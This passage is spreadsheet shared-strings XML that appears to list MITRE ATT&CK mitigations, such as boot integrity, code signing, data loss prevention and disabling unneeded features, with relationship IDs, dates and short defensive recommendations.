    <t>Some endpoint security solutions can be configured to block some types of behaviors related to process injection/memory tampering based on common sequences of indicators (ex: execution of specific API functions).</t>
  </si>
  <si>
    <t>relationship--39acd21f-8be0-4116-9449-09d1f4dd91fd</t>
  </si>
  <si>
    <t>02 March 2022</t>
  </si>
  <si>
    <t>relationship--ca928ba4-bb4b-4cd9-a105-8c0d4d81891f</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t>relationship--3086bfc5-96b1-4768-a243-a82da7155728</t>
  </si>
  <si>
    <t>relationship--868d0bb7-fb2a-42d8-8a8a-5772d8a10eea</t>
  </si>
  <si>
    <t>18 March 2022</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts or payloads.</t>
  </si>
  <si>
    <t>relationship--9c3ee91e-c64e-47c5-8aeb-300bc8aa6b6e</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to secure LSASS and prevent credential stealing. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--de3095b9-2434-48e8-880b-a4b75a1788c4</t>
  </si>
  <si>
    <t>Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process.</t>
  </si>
  <si>
    <t>relationship--ffe0659a-ff5b-4ffb-a842-38bb630fd6b8</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</si>
  <si>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</si>
  <si>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relationship--a8ec5ebc-8505-471c-ae81-877229b53a65</t>
  </si>
  <si>
    <t>05 January 2022</t>
  </si>
  <si>
    <t>Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of files with mismatching file signatures.</t>
  </si>
  <si>
    <t>relationship--096287e3-0985-4678-95d1-0f6e5a22b7e6</t>
  </si>
  <si>
    <t>Implement security controls on the endpoint, such as a Host Intrusion Prevention System (HIPS), to identify and prevent execution of potentially malicious files (such as those with mismatching file signatures).</t>
  </si>
  <si>
    <t>relationship--5566a165-9435-4683-9461-870f15450fd3</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office VBA macros from calling Win32 APIs. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--ba25a8ba-dc7a-4197-b885-d910524588b7</t>
  </si>
  <si>
    <t>relationship--782ee381-61f2-4405-b399-9faa99d00fea</t>
  </si>
  <si>
    <t>On Windows 10+, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated payloads. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--cca451aa-d4ca-4697-ac64-745841fb8658</t>
  </si>
  <si>
    <t>relationship--747c6b21-0916-43ee-9655-937cc9e9f0ab</t>
  </si>
  <si>
    <t>relationship--783be033-9c1b-4c44-a949-d120b0871d7c</t>
  </si>
  <si>
    <t>relationship--7b5bc34e-73b1-4f08-bef2-4e1307232f6d</t>
  </si>
  <si>
    <t>16 August 2021</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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29 November 2021</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</si>
  <si>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</si>
  <si>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relationship--bcdd57cf-632f-4fc5-a8e8-d3137cb832e8</t>
  </si>
  <si>
    <t>relationship--b33fd646-b98b-4ea0-8ae3-5cf0367140f6</t>
  </si>
  <si>
    <t>On Windows 10, update Windows Defender Application Control policies to include rules that block the older, vulnerable versions of PubPrn.(Citation: Microsoft_rec_block_rules)</t>
  </si>
  <si>
    <t>relationship--5279a80d-fe4c-45f5-a963-252e02640167</t>
  </si>
  <si>
    <t>27 August 2021</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block unsigned/untrusted executable files (such as .exe, .dll, or .scr) from running from USB removable drives. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--74a7cfb9-2b2a-44c2-b5ea-0327fe9e17e9</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by [PsExec](https://attack.mitre.org/software/S0029) from running. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--421f569c-e961-4112-a527-1aa5cabd37a1</t>
  </si>
  <si>
    <t>relationship--bcfcbbdb-302d-4e63-ba65-7333dfdaec3a</t>
  </si>
  <si>
    <t>22 March 2022</t>
  </si>
  <si>
    <t>relationship--5611881f-a9a3-4527-99a6-e717630703bb</t>
  </si>
  <si>
    <t>relationship--ee720f16-feda-4146-891e-fb814f912280</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</si>
  <si>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</si>
  <si>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relationship--3551c43c-b1b9-432b-8c3a-cf0265ca74ff</t>
  </si>
  <si>
    <t>relationship--50565ea3-2627-44b0-8dd3-155e37d425f3</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t>relationship--875eff48-2319-4e86-b3cf-0f17d6253b9c</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to block processes created by WMI commands from running. Note: many legitimate tools and applications utilize WMI for command execution. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--2869490f-0728-4a73-a9c2-3a5de5f9f5e7</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent malware from abusing WMI to attain persistence.(Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--dcbc4dd1-01e6-4ff6-b21e-572f5074f417</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</si>
  <si>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</si>
  <si>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relationship--0a28651c-ea35-4f05-a483-d9a60b06cbaf</t>
  </si>
  <si>
    <t>M1046</t>
  </si>
  <si>
    <t>Boot Integrity</t>
  </si>
  <si>
    <t>course-of-action--7da0387c-ba92-4553-b291-b636ee42b2eb</t>
  </si>
  <si>
    <t>Use Trusted Platform Module technology and a secure or trusted boot process to prevent system integrity from being compromised. (Citation: TCG Trusted Platform Module) (Citation: TechNet Secure Boot Process)</t>
  </si>
  <si>
    <t>relationship--25a6e5a0-28a7-40a4-baa8-7a9c688f3eb4</t>
  </si>
  <si>
    <t>Use of Secure Boot may prevent some implementations of modification to code signing policies.(Citation: Microsoft TESTSIGNING Feb 2021)</t>
  </si>
  <si>
    <t>relationship--a1dda2bd-b47b-42b3-a7e5-dd58cfac1e15</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</si>
  <si>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</si>
  <si>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relationship--6800b404-bdfe-46bf-8ce3-54819f990e1f</t>
  </si>
  <si>
    <t>23 April 2020</t>
  </si>
  <si>
    <t>Some vendors of embedded network devices provide cryptographic signing to ensure the integrity of operating system images at boot time.  Implement where available, following vendor guidelines. (Citation: Cisco IOS Software Integrity Assurance - Secure Boot)</t>
  </si>
  <si>
    <t>relationship--e8906be8-db8f-4ad3-829a-ca5eb4711584</t>
  </si>
  <si>
    <t>Check the integrity of the existing BIOS and device firmware to determine if it is vulnerable to modification.</t>
  </si>
  <si>
    <t>relationship--f365854f-76e6-4746-bab8-2f2b94b50087</t>
  </si>
  <si>
    <t>25 March 2022</t>
  </si>
  <si>
    <t>relationship--bd4686bf-27fb-44b7-8546-be8b57c99fcd</t>
  </si>
  <si>
    <t>relationship--42703ec8-4dd6-42a3-b2bb-f2a135f89863</t>
  </si>
  <si>
    <t>relationship--efb4adc8-b0a0-4562-a8c7-d0fe70c207be</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</si>
  <si>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</si>
  <si>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relationship--6b6b9464-4d0c-4e7e-9631-e2a3cdac6260</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</si>
  <si>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</si>
  <si>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relationship--0ee07cbe-2ff1-4ea9-8a72-c83a67ce4bba</t>
  </si>
  <si>
    <t>19 May 2020</t>
  </si>
  <si>
    <t>relationship--f8aff281-c6e4-47fd-8111-d1720126b49b</t>
  </si>
  <si>
    <t>M1045</t>
  </si>
  <si>
    <t>course-of-action--590777b3-b475-4c7c-aaf8-f4a73b140312</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</si>
  <si>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</si>
  <si>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relationship--256ce066-f81e-4cc4-bd5e-d83f7881f109</t>
  </si>
  <si>
    <t>03 August 2020</t>
  </si>
  <si>
    <t>Where possible, only permit execution of signed scripts.</t>
  </si>
  <si>
    <t>relationship--2cf7243f-d5d7-473b-9cb7-27c7186565d3</t>
  </si>
  <si>
    <t>Ensure all application component binaries are signed by the correct application developers.</t>
  </si>
  <si>
    <t>relationship--685da2a8-4205-4773-982b-5954393c70f8</t>
  </si>
  <si>
    <t>Enforce registration and execution of only legitimately signed service drivers where possible.</t>
  </si>
  <si>
    <t>relationship--a8e16c31-b516-4e64-ac0b-27d6b87bb82c</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</si>
  <si>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</si>
  <si>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relationship--775f9337-6cab-49f6-850e-af3038f0c806</t>
  </si>
  <si>
    <t>Ensure IIS DLLs and binaries are signed by the correct application developers.</t>
  </si>
  <si>
    <t>relationship--b736ab77-4dd6-4c80-8b8a-d15446436e0e</t>
  </si>
  <si>
    <t>Several cloud service providers support content trust models that require container images be signed by trusted sources.(Citation: Content trust in Azure Container Registry)(Citation: Content trust in Docker)</t>
  </si>
  <si>
    <t>relationship--24e20a3c-5f74-40bc-a5b0-108bc0233305</t>
  </si>
  <si>
    <t>16 October 2019</t>
  </si>
  <si>
    <t>Require signed binaries.</t>
  </si>
  <si>
    <t>relationship--3e646993-2414-4382-b709-6c5bc02740e3</t>
  </si>
  <si>
    <t>Enforce that all binaries be signed by the correct Apple Developer IDs.</t>
  </si>
  <si>
    <t>relationship--e3837dfd-a3c3-43d2-8f37-014c0bc03aa4</t>
  </si>
  <si>
    <t>Utilize a trust model such as Docker Content Trust with digital signatures to ensure runtime verification of the integrity and publisher of specific image tags.(Citation: Content trust in Docker)(Citation: Content trust in Azure Container Registry)</t>
  </si>
  <si>
    <t>relationship--1694d196-8f00-44ee-802f-274a2c566a15</t>
  </si>
  <si>
    <t>relationship--4fd3ec25-00ed-48c1-af72-e2523959860e</t>
  </si>
  <si>
    <t>09 June 2021</t>
  </si>
  <si>
    <t>Require signed binaries and images.</t>
  </si>
  <si>
    <t>relationship--3c37c043-7f27-4fb9-ba7f-bce3181849ac</t>
  </si>
  <si>
    <t>relationship--ae16d5d7-9a6f-4865-863a-2ce336b45795</t>
  </si>
  <si>
    <t>relationship--731ba292-7016-4ccf-a296-58ced0421a37</t>
  </si>
  <si>
    <t>Set PowerShell execution policy to execute only signed scripts.</t>
  </si>
  <si>
    <t>relationship--8fc79376-2f71-4ca1-8177-a96dea11f8c7</t>
  </si>
  <si>
    <t>Enforce execution of only signed PowerShell scripts. Sign profiles to avoid them from being modified.</t>
  </si>
  <si>
    <t>relationship--40d44aff-2f5f-4494-aa06-4ea1390df453</t>
  </si>
  <si>
    <t>08 February 2022</t>
  </si>
  <si>
    <t xml:space="preserve">Ensure all application component binaries are signed by the correct application developers. </t>
  </si>
  <si>
    <t>relationship--92c75170-c01a-4cfd-8861-a85be94e8721</t>
  </si>
  <si>
    <t>relationship--01a603b5-a9b1-4567-864d-6dfaa0430057</t>
  </si>
  <si>
    <t>15 July 2019</t>
  </si>
  <si>
    <t>relationship--ed31775e-0622-403a-b7a0-01d90b0d1c1f</t>
  </si>
  <si>
    <t>relationship--875ed563-004f-4541-99e4-21a556e5400c</t>
  </si>
  <si>
    <t>M1043</t>
  </si>
  <si>
    <t>Credential Access Protection</t>
  </si>
  <si>
    <t>course-of-action--49c06d54-9002-491d-9147-8efb537fbd26</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</si>
  <si>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</si>
  <si>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relationship--9cdefbe1-60ce-42b6-908d-1a630e78389c</t>
  </si>
  <si>
    <t>On Windows 10 and Server 2016, enable Windows Defender Credential Guard (Citation: Microsoft Enable Cred Guard April 2017) to run lsass.exe in an isolated virtualized environment without any device drivers. (Citation: Microsoft Credential Guard April 2017)</t>
  </si>
  <si>
    <t>relationship--6ca7aa45-86c5-4ba7-bd43-8d9446fb05d2</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</si>
  <si>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</si>
  <si>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relationship--72f97322-c7d1-41ea-a654-50e8039a8665</t>
  </si>
  <si>
    <t>relationship--a53cd21b-273f-43cf-a7e1-375aee6b66e9</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</si>
  <si>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</si>
  <si>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relationship--56499082-a21f-4d6d-9bdd-8ee6b2dfcad4</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</si>
  <si>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</si>
  <si>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relationship--e85b405b-bd20-4f66-aebc-3726768d46ed</t>
  </si>
  <si>
    <t>16 February 2022</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</si>
  <si>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</si>
  <si>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relationship--ee8ef62a-fcde-44b0-aa63-4028dad703aa</t>
  </si>
  <si>
    <t>14 June 2019</t>
  </si>
  <si>
    <t>relationship--7349c449-f6cd-44cd-858d-93c29320d7f0</t>
  </si>
  <si>
    <t>M1053</t>
  </si>
  <si>
    <t>Data Backup</t>
  </si>
  <si>
    <t>course-of-action--3efe43d1-6f3f-4fcb-ab39-4a730971f70b</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</si>
  <si>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</si>
  <si>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relationship--af1e6f67-b513-42f7-b5df-dfb04b38caf6</t>
  </si>
  <si>
    <t>25 March 2021</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</si>
  <si>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</si>
  <si>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relationship--f8bb44c8-d368-4d56-b039-50d6419ab60a</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</si>
  <si>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</si>
  <si>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relationship--bb402b5a-2ee4-4031-93a5-dae262794974</t>
  </si>
  <si>
    <t>relationship--8fbcd0f5-4fd4-482b-b965-9b4232e4ee64</t>
  </si>
  <si>
    <t>28 March 2020</t>
  </si>
  <si>
    <t>relationship--d11e8416-ca1f-46d6-8b95-ed03f708da9c</t>
  </si>
  <si>
    <t>relationship--dd8baf22-4e06-4b5e-81c6-d100048102e8</t>
  </si>
  <si>
    <t>relationship--f2fd105e-f481-486a-97b6-d5ef3324a787</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</si>
  <si>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</si>
  <si>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relationship--f9e62f6d-a091-44a9-91e6-3660b89ba2b9</t>
  </si>
  <si>
    <t>relationship--77d97059-4280-41d0-8280-596a6e2b8ff8</t>
  </si>
  <si>
    <t>M1057</t>
  </si>
  <si>
    <t>Data Loss Prevention</t>
  </si>
  <si>
    <t>course-of-action--65401701-019d-44ff-b223-08d520bb0e7b</t>
  </si>
  <si>
    <t>Data loss prevention can restrict access to sensitive data and detect sensitive data that is unencrypted.</t>
  </si>
  <si>
    <t>relationship--53e53569-4ae7-453c-953e-fc683e7794b0</t>
  </si>
  <si>
    <t>29 September 2021</t>
  </si>
  <si>
    <t>17 February 2022</t>
  </si>
  <si>
    <t>relationship--d92971eb-3ac4-4019-bbb3-dec4a2c6cb18</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being uploaded via web browsers.</t>
  </si>
  <si>
    <t>relationship--6c1c4fa3-7b48-4d9e-ab23-5f0c5dd4e98a</t>
  </si>
  <si>
    <t>05 August 2021</t>
  </si>
  <si>
    <t>relationship--e1d62223-d58c-4220-bd83-301128199908</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being sent over unencrypted protocols.</t>
  </si>
  <si>
    <t>relationship--cd857476-0e6f-4ae1-8065-7b1e8e6661b0</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being copied to physical mediums.</t>
  </si>
  <si>
    <t>relationship--17e06f95-da1f-4481-a586-9dfee23a26ed</t>
  </si>
  <si>
    <t>relationship--9bc3bb1f-6b1d-4267-95d8-ce4577f8fb1a</t>
  </si>
  <si>
    <t>Data loss prevention can be detect and block sensitive data being uploaded to web services via web browsers.</t>
  </si>
  <si>
    <t>relationship--9a6a51a9-5bbf-4fd9-b489-0502820cc8ae</t>
  </si>
  <si>
    <t>relationship--e460fd2b-6093-4700-a4a9-3bdea5297bdf</t>
  </si>
  <si>
    <t>Data loss prevention can detect and block sensitive data being copied to USB devices.</t>
  </si>
  <si>
    <t>relationship--e1c6ae29-cbe2-46f1-b415-fe39fd419a6e</t>
  </si>
  <si>
    <t>M1042</t>
  </si>
  <si>
    <t>Disable or Remove Feature or Program</t>
  </si>
  <si>
    <t>course-of-action--eb88d97c-32f1-40be-80f0-d61a4b0b4b31</t>
  </si>
  <si>
    <t>Consider disabling updating the ARP cache on gratuitous ARP replies.</t>
  </si>
  <si>
    <t>relationship--8fe9affe-bf8d-4392-882d-d3e737eb5c43</t>
  </si>
  <si>
    <t>28 July 2021</t>
  </si>
  <si>
    <t>If email delegation is not required, disable it. In Google Workspace this can be accomplished through the Google Admin console.(Citation: Gmail Delegation)</t>
  </si>
  <si>
    <t>relationship--f212430d-160e-4676-b541-8a7cb818fe6f</t>
  </si>
  <si>
    <t>Disable legacy network protocols that may be used   to intercept network traffic if applicable, especially those that are not needed within an environment.</t>
  </si>
  <si>
    <t>relationship--3e3c926e-4f21-40f0-b869-6b3c0e35e243</t>
  </si>
  <si>
    <t>CMSTP.exe may not be necessary within a given environment (unless using it for VPN connection installation).</t>
  </si>
  <si>
    <t>relationship--fd38c0fc-72d8-4638-b6e7-1f6c5964ab5c</t>
  </si>
  <si>
    <t>Disable unnecessary metadata services and restrict or disable insecure versions of metadata services that are in use to prevent adversary access.(Citation: Amazon AWS IMDS V2)</t>
  </si>
  <si>
    <t>relationship--ac4beabf-1644-4386-b34a-ebfc6e3bd3b0</t>
  </si>
  <si>
    <t>14 October 2020</t>
  </si>
  <si>
    <t>Disable or remove any unnecessary or unused shells or interpreters.</t>
  </si>
  <si>
    <t>relationship--6abc6901-d152-4b5f-b27d-8b973ae567cb</t>
  </si>
  <si>
    <t>Disable Autoruns if it is unnecessary.(Citation: Microsoft Disable Autorun)</t>
  </si>
  <si>
    <t>relationship--8506f2ac-e856-4d13-ac7e-fc88c4ec3c15</t>
  </si>
  <si>
    <t>14 July 2020</t>
  </si>
  <si>
    <t>Remove unnecessary tools and software from containers.</t>
  </si>
  <si>
    <t>relationship--a3a13b78-f599-4635-8750-2603bf18b370</t>
  </si>
  <si>
    <t>If direct virtual machine connections are not required for administrative use, disable these connection types where feasible.</t>
  </si>
  <si>
    <t>relationship--b4eefafe-e3d6-4b25-8485-7022c00cc462</t>
  </si>
  <si>
    <t>Consider disabling DCOM through Dcomcnfg.exe.(Citation: Microsoft Disable DCOM)</t>
  </si>
  <si>
    <t>relationship--6fa7ec61-ea14-40d1-b023-d8fd18738da9</t>
  </si>
  <si>
    <t>Consider removing previous versions of tools that are unnecessary to the environment when possible.</t>
  </si>
  <si>
    <t>relationship--e4fd283f-c168-442a-881d-70cf1eb67e20</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</si>
  <si>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</si>
  <si>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relationship--df52b929-6b31-48da-a21f-70b799e730d3</t>
  </si>
  <si>
    <t>Consider disabling external email forwarding.(Citation: Microsoft BEC Campaign)</t>
  </si>
  <si>
    <t>relationship--38b2c8da-e69e-4e17-8ba9-c967d7af3a0a</t>
  </si>
  <si>
    <t>15 June 2021</t>
  </si>
  <si>
    <t>Consider disabling emond by removing the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) plist file.</t>
  </si>
  <si>
    <t>relationship--b02a8c2b-3ead-4546-9e68-d1545c5fcdd7</t>
  </si>
  <si>
    <t>relationship--f705286a-3372-4343-b74f-cab6ff672774</t>
  </si>
  <si>
    <t>Disable Bluetooth in local computer security settings or by group policy if it is not needed within an environment.</t>
  </si>
  <si>
    <t>relationship--aa23c885-30a5-4715-bf64-7ccbfaba9131</t>
  </si>
  <si>
    <t>Disable WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel in local computer security settings or by group policy if it is not needed within an environment.</t>
  </si>
  <si>
    <t>relationship--3f407ec6-355d-4741-903a-a58c726f78d1</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if they are not required for business operations. (Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>relationship--c8ff6191-a8ac-4f12-b336-a2e0c7644082</t>
  </si>
  <si>
    <t>relationship--553aadc2-8c1c-4ad7-b974-c65f99f6a892</t>
  </si>
  <si>
    <t>Minimize available services to only those that are necessary.</t>
  </si>
  <si>
    <t>relationship--0694f0b0-c7c1-43c6-8024-17122fda2bc4</t>
  </si>
  <si>
    <t>Disable or block remotely available services that may be unnecessary.</t>
  </si>
  <si>
    <t>relationship--9aaf5e70-4080-4f73-8d6d-3b19f754e9b9</t>
  </si>
  <si>
    <t>19 August 2021</t>
  </si>
  <si>
    <t>InstallUtil may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--a6352ede-7afb-4be5-bba4-bd5c0a20bae6</t>
  </si>
  <si>
    <t>relationship--16f46969-91e3-4bcd-8d58-97e88e6b1d3e</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded scripting components.</t>
  </si>
  <si>
    <t>relationship--a2eb983e-f4ad-45a3-9348-088bbfdbab77</t>
  </si>
  <si>
    <t>Disable LLMNR and NetBIOS in local computer security settings or by group policy if they are not needed within an environment. (Citation: ADSecurity Windows Secure Baseline)</t>
  </si>
  <si>
    <t>relationship--2fb84998-3f4a-4ce8-9709-daa95d18186a</t>
  </si>
  <si>
    <t xml:space="preserve">MMC may not be necessary within a given environment since it is primarily used by system administrators, not regular users or clients. </t>
  </si>
  <si>
    <t>relationship--ac005901-af89-4bcd-bb7f-515539dbb96c</t>
  </si>
  <si>
    <t>MSBuild.exe may not be necessary within an environment and should be removed if not being used.</t>
  </si>
  <si>
    <t>relationship--a6c274f5-43e1-4f69-a182-0c4ab9d0a5ed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</si>
  <si>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</si>
  <si>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relationship--566db8cc-9dd7-496b-8d40-e510fcf6b9fe</t>
  </si>
  <si>
    <t>Consider removing mavinject.exe if Microsoft App-V is not used within a given environment.</t>
  </si>
  <si>
    <t>relationship--8bc92d99-f6ea-4ec8-9c23-cc910b17809c</t>
  </si>
  <si>
    <t>Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer that have reached end of life.</t>
  </si>
  <si>
    <t>relationship--98afbb05-d48e-4438-add6-df3ea9fb568c</t>
  </si>
  <si>
    <t>Consider disabling the &lt;code&gt;AlwaysInstallElevated&lt;/code&gt; policy to prevent elevated execution of Windows Installer packages.(Citation: Microsoft AlwaysInstallElevated 2018)</t>
  </si>
  <si>
    <t>relationship--9d44abc9-f1f3-4111-a474-7dd0b224dd46</t>
  </si>
  <si>
    <t>14 December 2020</t>
  </si>
  <si>
    <t>Ensure that unnecessary ports and services are closed to prevent risk of discovery and potential exploitation.</t>
  </si>
  <si>
    <t>relationship--32d482c4-2c0d-4688-a38b-d73b5b2962a3</t>
  </si>
  <si>
    <t>Odbcconf.exe may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--5a72e713-c8fb-4438-9a08-0ded824381dd</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</si>
  <si>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</si>
  <si>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relationship--62d8cec2-c94f-4a18-ab0a-0a182e30f33a</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</si>
  <si>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</si>
  <si>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relationship--be510dc5-eae7-4231-808b-645a7b04c15a</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</si>
  <si>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</si>
  <si>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relationship--5a580cd0-19f1-41d6-865b-786a41081a7e</t>
  </si>
  <si>
    <t>Disable the RDP service if it is unnecessary.</t>
  </si>
  <si>
    <t>relationship--8aa82bc1-bd38-482d-9cb6-b83877e0b0f4</t>
  </si>
  <si>
    <t>This feature can be disabled entirely with the following terminal command: &lt;code&gt;defaults write -g ApplePersistence -bool no&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--025b9140-a0aa-4802-b60c-a4fcb886f90c</t>
  </si>
  <si>
    <t>Regsvcs and Regasm may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--ce47df8d-02dc-4380-90f8-282e009ef0fe</t>
  </si>
  <si>
    <t>relationship--703a5971-a542-4d7d-8bf5-7a9adb1db852</t>
  </si>
  <si>
    <t>Disable the remote service (ex: SSH, RDP, etc.) if it is unnecessary.</t>
  </si>
  <si>
    <t>relationship--8c271707-cc73-4cb5-a554-75d74abafac9</t>
  </si>
  <si>
    <t>If remote services, such as the ability to make direct connections to cloud virtual machines, are not required, disable these connection types where feasible.</t>
  </si>
  <si>
    <t>relationship--b3cf2464-2602-4a88-8e7a-dda56eff05ff</t>
  </si>
  <si>
    <t>Disable Autorun if it is unnecessary. (Citation: Microsoft Disable Autorun) Disallow or restrict removable media at an organizational policy level if it is not required for business operations. (Citation: TechNet Removable Media Control)</t>
  </si>
  <si>
    <t>relationship--5b2d2786-1ccb-41d9-90dc-4e11d517bfe2</t>
  </si>
  <si>
    <t>Disable Hyper-V if not necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--1ec28c41-586b-42dc-9400-6e6313e38d84</t>
  </si>
  <si>
    <t>Disable the SSH daemon on systems that do not require it. For macOS ensure Remote Login is disabled under Sharing Preferences.(Citation: Apple Unified Log Analysis Remote Login and Screen Sharing)</t>
  </si>
  <si>
    <t>relationship--0263d539-39f0-45ca-be2d-0f9198db9af0</t>
  </si>
  <si>
    <t>Disable SSH if it is not necessary on a host or restrict SSH access for specific users/groups using &lt;code&gt;/etc/ssh/sshd_config&lt;/code&gt;.</t>
  </si>
  <si>
    <t>relationship--8faa230d-ced2-4289-81c5-554fd6dc62fd</t>
  </si>
  <si>
    <t>Ensure that agent forwarding is disabled on systems that do not explicitly require this feature to prevent misuse. (Citation: Symantec SSH and ssh-agent)</t>
  </si>
  <si>
    <t>relationship--99ea03d5-6c11-4f5e-9ab1-13ee0f4fca43</t>
  </si>
  <si>
    <t>Use Group Policy to disable screensavers if they are unnecessary.(Citation: TechNet Screensaver GP)</t>
  </si>
  <si>
    <t>relationship--6a13bd6f-fa86-4fdd-9add-6446ef2679b0</t>
  </si>
  <si>
    <t>Consider disabling software components from servers when possible to prevent abuse by adversaries.(Citation: ITSyndicate Disabling PHP functions)</t>
  </si>
  <si>
    <t>relationship--57350311-f2bd-4ca8-ba95-67c255422bbb</t>
  </si>
  <si>
    <t>Consider disabling old/dangerous authentication protocols (e.g. NTLM), as well as unnecessary certificate features, such as potentially vulnerable AD CS web and other enrollment server roles.(Citation: SpecterOps Certified Pre Owned)</t>
  </si>
  <si>
    <t>relationship--3881a82b-37fa-4e91-a411-a0f2b4410749</t>
  </si>
  <si>
    <t>Many native binaries may not be necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--c8c7f580-982a-4efc-8a2a-e007e7f07220</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</si>
  <si>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</si>
  <si>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relationship--cf485f42-cc2f-4ef7-9226-533192a9413c</t>
  </si>
  <si>
    <t>Disable Wake-on-LAN if it is not needed within an environment.</t>
  </si>
  <si>
    <t>relationship--c2a79396-f264-4439-94f1-113e3bf3a6be</t>
  </si>
  <si>
    <t>16 February 2021</t>
  </si>
  <si>
    <t>23 February 2022</t>
  </si>
  <si>
    <t>Specific developer utilities may not be necessary within a given environment and should be removed if not used.</t>
  </si>
  <si>
    <t>relationship--f4e83a18-a2bf-45af-aa6b-18f72646d8b6</t>
  </si>
  <si>
    <t>21 June 2019</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded VB components.(Citation: Microsoft Disable VBA Jan 2020)</t>
  </si>
  <si>
    <t>relationship--9f001062-668f-45c9-a747-f224c8e5712a</t>
  </si>
  <si>
    <t>Uninstall any VNC server software where not required.</t>
  </si>
  <si>
    <t>relationship--03e384be-6fdd-4967-99a9-6dac5af75729</t>
  </si>
  <si>
    <t>Consider removing verclsid.exe if it is not necessary within a given environment.</t>
  </si>
  <si>
    <t>relationship--9767394f-960b-47d4-8123-cfcc5d6ab66a</t>
  </si>
  <si>
    <t>Turn off or restrict access to unneeded VB components.</t>
  </si>
  <si>
    <t>relationship--0f27ea83-21e7-4a9f-9c66-85fe85da5135</t>
  </si>
  <si>
    <t>Consider disabling functions from web technologies such as PHP’s `evaI()` that may be abused for web shells.(Citation: ITSyndicate Disabling PHP functions)</t>
  </si>
  <si>
    <t>relationship--c077dd0a-7568-400b-9aad-e0535f356f71</t>
  </si>
  <si>
    <t>22 July 2021</t>
  </si>
  <si>
    <t>Consider enabling the “Network access: Do not allow storage of passwords and credentials for network authentication” setting that will prevent network credentials from being stored by the Credential Manager.(Citation: Microsoft Network access Credential Manager)</t>
  </si>
  <si>
    <t>relationship--841330d7-96f7-453a-9a91-9dd2c6e1cfc4</t>
  </si>
  <si>
    <t>Disable the WinRM service.</t>
  </si>
  <si>
    <t>relationship--1677745c-06d5-4791-be9c-1104549c34b2</t>
  </si>
  <si>
    <t>Remove or disable access to any systems, resources, and infrastructure that are not explicitly required to be available externally.</t>
  </si>
  <si>
    <t>relationship--117756fe-fb41-414d-81ab-63e0bb1ccdc8</t>
  </si>
  <si>
    <t>M1055</t>
  </si>
  <si>
    <t>Do Not Mitigate</t>
  </si>
  <si>
    <t>course-of-action--787fb64d-c87b-4ee5-a341-0ef17ec4c15c</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</si>
  <si>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</si>
  <si>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relationship--9a513f75-f09b-4840-8654-521fa4ff59fa</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</si>
  <si>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</si>
  <si>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relationship--20cc9dc5-61ad-4fbb-86da-4861e60b98e4</t>
  </si>
  <si>
    <t>M1041</t>
  </si>
  <si>
    <t>Encrypt Sensitive Information</t>
  </si>
  <si>
    <t>course-of-action--feff9142-e8c2-46f4-842b-bd6fb3d41157</t>
  </si>
  <si>
    <t>Ensure that all wired and/or wireless traffic is encrypted appropriately. Use best practices for authentication protocols, such as Kerberos, and ensure web traffic that may contain credentials is protected by SSL/TLS.</t>
  </si>
  <si>
    <t>relationship--07bc8502-7a60-4d19-b1e1-f4fb081ed50d</t>
  </si>
  <si>
    <t>Enable AES Kerberos encryption (or another stronger encryption algorithm), rather than RC4, where possible.(Citation: AdSecurity Cracking Kerberos Dec 2015)</t>
  </si>
  <si>
    <t>relationship--b05e473b-ac33-42ce-b7c6-a2a8517def0d</t>
  </si>
  <si>
    <t>25 August 2020</t>
  </si>
  <si>
    <t>relationship--0d891052-0c98-4d4a-8d1b-42a02f656eaf</t>
  </si>
  <si>
    <t>16 October 2020</t>
  </si>
  <si>
    <t>File encryption should be enforced across email communications containing sensitive information that may be obtained through access to email services.</t>
  </si>
  <si>
    <t>relationship--efafd777-c53d-4459-8765-2e5e44cd0ea1</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</si>
  <si>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</si>
  <si>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relationship--967c7069-6bb3-4f10-ba6b-5befdabe6c97</t>
  </si>
  <si>
